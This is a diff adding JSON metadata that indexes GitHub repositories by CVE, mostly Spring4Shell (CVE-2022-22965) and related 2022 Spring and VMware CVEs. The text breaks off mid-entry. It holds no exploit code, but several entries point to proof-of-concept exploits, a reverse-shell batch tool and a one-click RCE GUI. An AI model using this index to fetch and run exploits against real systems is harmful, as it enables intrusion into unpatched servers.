+ "id": 44880203, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44880203?v=4", + "html_url": "https:\/\/github.com\/p1ckzi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/p1ckzi\/CVE-2022-22965", + "description": "spring4shell | CVE-2022-22965", + "fork": false, + "created_at": "2022-04-12T14:59:42Z", + "updated_at": "2024-08-12T20:22:22Z", + "pushed_at": "2022-06-30T10:55:54Z", + "stargazers_count": 22, + "watchers_count": 22, + "has_discussions": true, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2022-22965", + "exploit", + "pentesting", + "spring-framework", + "tomcat" + ], + "visibility": "public", + "forks": 7, + "watchers": 22, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 481013803, + "name": "-Spring4Shell-CVE-2022-22965-", + "full_name": "Omaraitbenhaddi\/-Spring4Shell-CVE-2022-22965-", + "owner": { + "login": "Omaraitbenhaddi", + "id": 88466716, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88466716?v=4", + "html_url": "https:\/\/github.com\/Omaraitbenhaddi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Omaraitbenhaddi\/-Spring4Shell-CVE-2022-22965-", + "description": "exploitation script tryhackme ", + "fork": false, + "created_at": "2022-04-13T00:15:55Z", + "updated_at": "2022-04-13T00:18:45Z", + "pushed_at": "2022-04-13T00:19:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 484003361, + "name": "CVE-2022-22965_PoC", + "full_name": "c4mx\/CVE-2022-22965_PoC", + "owner": { + "login": "c4mx", + "id": 16646683, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16646683?v=4", + "html_url": "https:\/\/github.com\/c4mx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/c4mx\/CVE-2022-22965_PoC", + "description": null, + "fork": false, + "created_at": "2022-04-21T10:17:42Z", + "updated_at": "2022-04-21T10:18:51Z", + "pushed_at": "2022-04-21T10:18:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 484697115, + "name": "CVE-2022-22965", + "full_name": "mariomamo\/CVE-2022-22965", + "owner": { + "login": "mariomamo", + "id": 45656028, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45656028?v=4", + "html_url": "https:\/\/github.com\/mariomamo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mariomamo\/CVE-2022-22965", + "description": null, + "fork": false, + "created_at": "2022-04-23T09:01:22Z", + "updated_at": "2024-08-12T20:22:40Z", + "pushed_at": "2022-04-28T13:25:08Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 486099149, + "name": "CVE-2022-22965", + "full_name": "khidottrivi\/CVE-2022-22965", + "owner": { + "login": "khidottrivi", + "id": 59863567, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59863567?v=4", + "html_url": "https:\/\/github.com\/khidottrivi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/khidottrivi\/CVE-2022-22965", + "description": null, + "fork": false, + "created_at": "2022-04-27T07:57:50Z", + "updated_at": "2024-09-14T03:07:42Z", + "pushed_at": "2022-04-27T08:10:46Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 486922280, + "name": "spring-RCE-CVE-2022-22965", + "full_name": "Enokiy\/spring-RCE-CVE-2022-22965", + "owner": { + "login": "Enokiy", + "id": 33446650, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33446650?v=4", + "html_url": "https:\/\/github.com\/Enokiy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Enokiy\/spring-RCE-CVE-2022-22965", + "description": null, + "fork": false, + "created_at": "2022-04-29T09:58:05Z", + "updated_at": "2022-04-29T10:03:38Z", + "pushed_at": "2022-04-29T10:03:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 494256387, + "name": "CVE-2022-22965-spring4shell", + "full_name": "cxzero\/CVE-2022-22965-spring4shell", + "owner": { + "login": "cxzero", + "id": 17437230, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17437230?v=4", + "html_url": "https:\/\/github.com\/cxzero", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cxzero\/CVE-2022-22965-spring4shell", + "description": "CVE-2022-22965 Spring4Shell research & PoC", + "fork": false, + "created_at": "2022-05-19T23:16:40Z", + "updated_at": "2023-07-01T06:14:54Z", + "pushed_at": "2023-12-21T22:07:02Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-22965", + "spring-framework", + "spring4shell", + "spring4shell-poc" + ], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 505114933, + "name": "SpringVulScan", + "full_name": "tpt11fb\/SpringVulScan", + "owner": { + "login": "tpt11fb", + "id": 80188324, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80188324?v=4", + "html_url": "https:\/\/github.com\/tpt11fb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tpt11fb\/SpringVulScan", + "description": "burpsuite 的Spring漏洞扫描插件。SpringVulScan:支持检测:路由泄露|CVE-2022-22965|CVE-2022-22963|CVE-2022-22947|CVE-2016-4977", + "fork": false, + "created_at": "2022-06-19T13:16:55Z", + "updated_at": "2024-09-02T04:19:54Z", + "pushed_at": "2023-01-23T13:00:34Z", + "stargazers_count": 149, + "watchers_count": 149, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 149, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 510569312, + "name": "Spring4Shell-CVE-2022-22965", + "full_name": "D1mang\/Spring4Shell-CVE-2022-22965", + "owner": { + "login": "D1mang", + "id": 24488612, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24488612?v=4", + "html_url": "https:\/\/github.com\/D1mang", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/D1mang\/Spring4Shell-CVE-2022-22965", + "description": "EXP for Spring4Shell(CVE-2022-22965)", + "fork": false, + "created_at": "2022-07-05T03:03:31Z", + "updated_at": "2022-07-27T02:20:42Z", + "pushed_at": "2022-07-13T00:30:22Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 563378340, + "name": "Fast-CVE-2022-22965", + "full_name": "iloveflag\/Fast-CVE-2022-22965", + "owner": { + "login": "iloveflag", + "id": 25424842, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25424842?v=4", + "html_url": "https:\/\/github.com\/iloveflag", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/iloveflag\/Fast-CVE-2022-22965", + "description": "CVE-2022-22965图形化检测工具", + "fork": false, + "created_at": "2022-11-08T13:45:35Z", + "updated_at": "2023-02-07T02:30:57Z", + "pushed_at": "2022-11-08T14:15:29Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 571622287, + "name": "CVE-2022-22965-PoC", + "full_name": "ClemExp\/CVE-2022-22965-PoC", + "owner": { + "login": "ClemExp", + "id": 29142602, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29142602?v=4", + "html_url": "https:\/\/github.com\/ClemExp", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ClemExp\/CVE-2022-22965-PoC", + "description": null, + "fork": false, + "created_at": "2022-11-28T14:28:07Z", + "updated_at": "2022-11-28T14:28:07Z", + "pushed_at": "2022-11-28T14:28:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 571625311, + "name": "SSE4-CVE-2022-22965", + "full_name": "clemoregan\/SSE4-CVE-2022-22965", + "owner": { + "login": "clemoregan", + "id": 108123459, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108123459?v=4", + "html_url": "https:\/\/github.com\/clemoregan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/clemoregan\/SSE4-CVE-2022-22965", + "description": "CVE-2022-22965 proof of concept", + "fork": false, + "created_at": "2022-11-28T14:34:51Z", + "updated_at": "2022-11-29T04:29:29Z", + "pushed_at": "2022-11-28T15:26:02Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 577393656, + "name": "CVE-2022-22965", + "full_name": "devengpk\/CVE-2022-22965", + "owner": { + "login": "devengpk", + "id": 41437020, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41437020?v=4", + "html_url": "https:\/\/github.com\/devengpk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/devengpk\/CVE-2022-22965", + "description": null, + "fork": false, + "created_at": "2022-12-12T16:30:05Z", + "updated_at": "2022-12-12T16:50:14Z", + "pushed_at": "2022-12-16T19:17:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 582867088, + "name": "CVE-2022-22965-rexbb", + "full_name": "zangcc\/CVE-2022-22965-rexbb", + "owner": { + "login": "zangcc", + "id": 64825932, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64825932?v=4", + "html_url": "https:\/\/github.com\/zangcc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zangcc\/CVE-2022-22965-rexbb", + "description": "CVE-2022-22965\\Spring-Core-RCE核弹级别漏洞的rce图形化GUI一键利用工具,基于JavaFx开发,图形化操作更简单,提高效率。", + "fork": false, + "created_at": "2022-12-28T04:50:16Z", + "updated_at": "2024-11-04T09:39:46Z", + "pushed_at": "2023-11-14T03:08:10Z", + "stargazers_count": 99, + "watchers_count": 99, + "has_discussions": false, + "forks_count": 15, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 15, + "watchers": 99, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 584868904, + "name": "Spring4Shell-CVE-2022-22965-POC", + "full_name": "ajith737\/Spring4Shell-CVE-2022-22965-POC", + "owner": { + "login": "ajith737", + "id": 72512571, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72512571?v=4", + "html_url": "https:\/\/github.com\/ajith737", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ajith737\/Spring4Shell-CVE-2022-22965-POC", + "description": "User friendly Spring4Shell POC", + "fork": false, + "created_at": "2023-01-03T18:15:07Z", + "updated_at": "2023-01-03T18:15:14Z", + "pushed_at": "2023-01-03T18:53:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 608448692, + "name": "CVE-2022-22965", + "full_name": "c33dd\/CVE-2022-22965", + "owner": { + "login": "c33dd", + "id": 63436417, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63436417?v=4", + "html_url": "https:\/\/github.com\/c33dd", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/c33dd\/CVE-2022-22965", + "description": " 🚀 Exploit for Spring core RCE in C [ wip ]", + "fork": false, + "created_at": "2023-03-02T03:09:39Z", + "updated_at": "2023-02-28T17:01:21Z", + "pushed_at": "2023-02-28T16:49:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 613032720, + "name": "Spring4Shell-PoC-exploit", + "full_name": "gokul-ramesh\/Spring4Shell-PoC-exploit", + "owner": { + "login": "gokul-ramesh", + "id": 65040016, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65040016?v=4", + "html_url": "https:\/\/github.com\/gokul-ramesh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gokul-ramesh\/Spring4Shell-PoC-exploit", + "description": "Demonstrable Proof of Concept Exploit for Spring4Shell Vulnerability (CVE-2022-22965)", + "fork": false, + "created_at": "2023-03-12T17:37:51Z", + "updated_at": "2024-06-24T06:32:48Z", + "pushed_at": "2023-03-17T14:30:25Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-22965", + "exploit-poc", + "spring4shell" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 647731640, + "name": "Telstra-Cybersecurity-Virtual-Experience-", + "full_name": "bL34cHig0\/Telstra-Cybersecurity-Virtual-Experience-", + "owner": { + "login": "bL34cHig0", + "id": 133022207, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/133022207?v=4", + "html_url": "https:\/\/github.com\/bL34cHig0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bL34cHig0\/Telstra-Cybersecurity-Virtual-Experience-", + "description": "A simple python script for a firewall rule that blocks incoming requests based on the Spring4Shell (CVE-2022-22965) vulnerability", + "fork": false, + "created_at": "2023-05-31T12:04:25Z", + "updated_at": "2024-09-19T04:14:46Z", + "pushed_at": "2024-03-19T13:42:29Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "firewall-rules", + "incident-response", + "malware-analysis", + "network-analysis", + "python", + "python3", + "pythonscript", + "spring4shell", + "tomcat-server", + "webserver", + "zeroday", + "zeroday-attack" + ], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 649060182, + "name": "CVE-2022-22965", + "full_name": "BKLockly\/CVE-2022-22965", + "owner": { + "login": "BKLockly", + "id": 113906689, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/113906689?v=4", + "html_url": "https:\/\/github.com\/BKLockly", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BKLockly\/CVE-2022-22965", + "description": "Poc&Exp,支持批量扫描,反弹shell", + "fork": false, + "created_at": "2023-06-03T16:39:50Z", + "updated_at": "2023-10-12T17:15:11Z", + "pushed_at": "2023-06-04T03:51:56Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 650528662, + "name": "Spring4Shell", + "full_name": "dbgee\/Spring4Shell", + "owner": { + "login": "dbgee", + "id": 46910972, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46910972?v=4", + "html_url": "https:\/\/github.com\/dbgee", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dbgee\/Spring4Shell", + "description": "Spring rce environment for CVE-2022-22965", + "fork": false, + "created_at": "2023-06-07T09:02:50Z", + "updated_at": "2023-06-08T03:38:35Z", + "pushed_at": "2023-06-08T03:37:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 656168817, + "name": "CVE-2022-22965-Spring4Shell", + "full_name": "jakabakos\/CVE-2022-22965-Spring4Shell", + "owner": { + "login": "jakabakos", + "id": 42498816, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42498816?v=4", + "html_url": "https:\/\/github.com\/jakabakos", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jakabakos\/CVE-2022-22965-Spring4Shell", + "description": "PoC and exploit for CVE-2022-22965 Spring4Shell", + "fork": false, + "created_at": "2023-06-20T11:45:29Z", + "updated_at": "2024-06-06T11:59:00Z", + "pushed_at": "2023-06-21T10:28:40Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 686301684, + "name": "Spring4Shell-CVE-2022-22965", + "full_name": "sohamsharma966\/Spring4Shell-CVE-2022-22965", + "owner": { + "login": "sohamsharma966", + "id": 72042665, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72042665?v=4", + "html_url": "https:\/\/github.com\/sohamsharma966", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sohamsharma966\/Spring4Shell-CVE-2022-22965", + "description": null, + "fork": false, + "created_at": "2023-09-02T10:41:05Z", + "updated_at": "2023-09-02T10:41:30Z", + "pushed_at": "2023-09-02T10:51:27Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 717886733, + "name": "CVE-2022-22965", + "full_name": "LucasPDiniz\/CVE-2022-22965", + "owner": { + "login": "LucasPDiniz", + "id": 57265360, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57265360?v=4", + "html_url": "https:\/\/github.com\/LucasPDiniz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LucasPDiniz\/CVE-2022-22965", + "description": "Spring4Shell Vulnerability RCE - CVE-2022-22965 ", + "fork": false, + "created_at": "2023-11-12T22:15:32Z", + "updated_at": "2024-06-30T21:57:34Z", + "pushed_at": "2024-06-30T21:57:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "2022", + "cve-2022-22965", + "spring", + "spring4shell", + "springboot", + "vulnerability" + ], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 794376820, + "name": "SpringFramework_CVE-2022-22965_RCE", + "full_name": "xsxtw\/SpringFramework_CVE-2022-22965_RCE", + "owner": { + "login": "xsxtw", + "id": 168295718, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/168295718?v=4", + "html_url": "https:\/\/github.com\/xsxtw", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xsxtw\/SpringFramework_CVE-2022-22965_RCE", + "description": null, + "fork": false, + "created_at": "2024-05-01T02:36:13Z", + "updated_at": "2024-05-01T02:39:16Z", + "pushed_at": "2024-05-01T02:39:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 883824974, + "name": "Expoitation-de-la-vuln-rabilit-CVE-2022-22965", + "full_name": "guigui237\/Expoitation-de-la-vuln-rabilit-CVE-2022-22965", + "owner": { + "login": "guigui237", + "id": 184559460, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/184559460?v=4", + "html_url": "https:\/\/github.com\/guigui237", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/guigui237\/Expoitation-de-la-vuln-rabilit-CVE-2022-22965", + "description": null, + "fork": false, + "created_at": "2024-11-05T16:30:00Z", + "updated_at": "2024-11-06T23:04:42Z", + "pushed_at": "2024-11-06T23:04:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-22966.json b/2022/CVE-2022-22966.json new file mode 100644 index 0000000000..5c5fcaece2 --- /dev/null +++ b/2022/CVE-2022-22966.json @@ -0,0 +1,33 @@ +[ + { + "id": 519963010, + "name": "CVE-2022-22966", + "full_name": "bb33bb\/CVE-2022-22966", + "owner": { + "login": "bb33bb", + "id": 5463104, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5463104?v=4", + "html_url": "https:\/\/github.com\/bb33bb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bb33bb\/CVE-2022-22966", + "description": "Exploit for SpringShell.", + "fork": false, + "created_at": "2022-08-01T04:29:02Z", + "updated_at": "2022-08-01T04:28:59Z", + "pushed_at": "2022-07-31T08:26:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-22968.json b/2022/CVE-2022-22968.json new file mode 100644 index 0000000000..cdd617289d --- /dev/null +++ b/2022/CVE-2022-22968.json @@ -0,0 +1,33 @@ +[ + { + "id": 491625244, + "name": "spring-rce-poc", + "full_name": "MarcinGadz\/spring-rce-poc", + "owner": { + "login": "MarcinGadz", + "id": 70522915, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70522915?v=4", + "html_url": "https:\/\/github.com\/MarcinGadz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MarcinGadz\/spring-rce-poc", + "description": "Testing CVE-2022-22968", + "fork": false, + "created_at": "2022-05-12T18:25:18Z", + "updated_at": "2024-05-05T02:58:57Z", + "pushed_at": "2022-05-13T14:26:29Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-22970.json b/2022/CVE-2022-22970.json new file mode 100644 index 0000000000..3529e3b8c9 --- /dev/null +++ b/2022/CVE-2022-22970.json @@ -0,0 +1,33 @@ +[ + { + "id": 891177744, + "name": "CVE-2022-22970", + "full_name": "Performant-Labs\/CVE-2022-22970", + "owner": { + "login": "Performant-Labs", + "id": 35463594, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35463594?v=4", + "html_url": "https:\/\/github.com\/Performant-Labs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Performant-Labs\/CVE-2022-22970", + "description": null, + "fork": false, + "created_at": "2024-11-19T21:36:09Z", + "updated_at": "2024-11-22T17:48:39Z", + "pushed_at": "2024-11-22T17:48:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-22971.json b/2022/CVE-2022-22971.json new file mode 100644 index 0000000000..f391c62a17 --- /dev/null +++ b/2022/CVE-2022-22971.json @@ -0,0 +1,33 @@ +[ + { + "id": 571017067, + "name": "CVE-2022-22971", + "full_name": "tchize\/CVE-2022-22971", + "owner": { + "login": "tchize", + "id": 7933441, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7933441?v=4", + "html_url": "https:\/\/github.com\/tchize", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tchize\/CVE-2022-22971", + "description": null, + "fork": false, + "created_at": "2022-11-26T22:04:38Z", + "updated_at": "2022-12-10T16:57:07Z", + "pushed_at": "2022-11-27T00:28:38Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-22972.json b/2022/CVE-2022-22972.json new file mode 100644 index 0000000000..0ce0d1e87d --- /dev/null +++ b/2022/CVE-2022-22972.json @@ -0,0 +1,99 @@ +[ + { + "id": 495975756, + "name": "CVE-2022-22972", + "full_name": "horizon3ai\/CVE-2022-22972", + "owner": { + "login": "horizon3ai", + "id": 79593994, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79593994?v=4", + "html_url": "https:\/\/github.com\/horizon3ai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/horizon3ai\/CVE-2022-22972", + "description": null, + "fork": false, + "created_at": "2022-05-24T20:19:55Z", + "updated_at": "2024-09-18T22:47:30Z", + "pushed_at": "2022-05-26T16:07:18Z", + "stargazers_count": 154, + "watchers_count": 154, + "has_discussions": false, + "forks_count": 31, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 31, + "watchers": 154, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 497426008, + "name": "CVE-2022-22972", + "full_name": "Dghpi9\/CVE-2022-22972", + "owner": { + "login": "Dghpi9", + "id": 96538641, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96538641?v=4", + "html_url": "https:\/\/github.com\/Dghpi9", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Dghpi9\/CVE-2022-22972", + "description": "vmware authentication bypass", + "fork": false, + "created_at": "2022-05-28T20:56:09Z", + "updated_at": "2022-05-30T01:01:11Z", + "pushed_at": "2022-05-30T03:10:48Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-22972", + "poc", + "vmware" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 503757832, + "name": "CVE-2022-22972-", + "full_name": "bengisugun\/CVE-2022-22972-", + "owner": { + "login": "bengisugun", + "id": 61907439, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61907439?v=4", + "html_url": "https:\/\/github.com\/bengisugun", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bengisugun\/CVE-2022-22972-", + "description": "IOC List", + "fork": false, + "created_at": "2022-06-15T12:34:20Z", + "updated_at": "2024-08-12T20:24:11Z", + "pushed_at": "2022-06-15T12:37:02Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-22976.json b/2022/CVE-2022-22976.json new file mode 100644 index 0000000000..8f3726782c --- /dev/null +++ b/2022/CVE-2022-22976.json @@ -0,0 +1,33 @@ +[ + { + "id": 490780231, + "name": "cve-2022-22976-bcrypt-skips-salt", + "full_name": "spring-io\/cve-2022-22976-bcrypt-skips-salt", + "owner": { + "login": "spring-io", + "id": 5138804, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5138804?v=4", + "html_url": "https:\/\/github.com\/spring-io", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/spring-io\/cve-2022-22976-bcrypt-skips-salt", + "description": null, + "fork": false, + "created_at": "2022-05-10T16:36:13Z", + "updated_at": "2024-05-03T11:57:23Z", + "pushed_at": 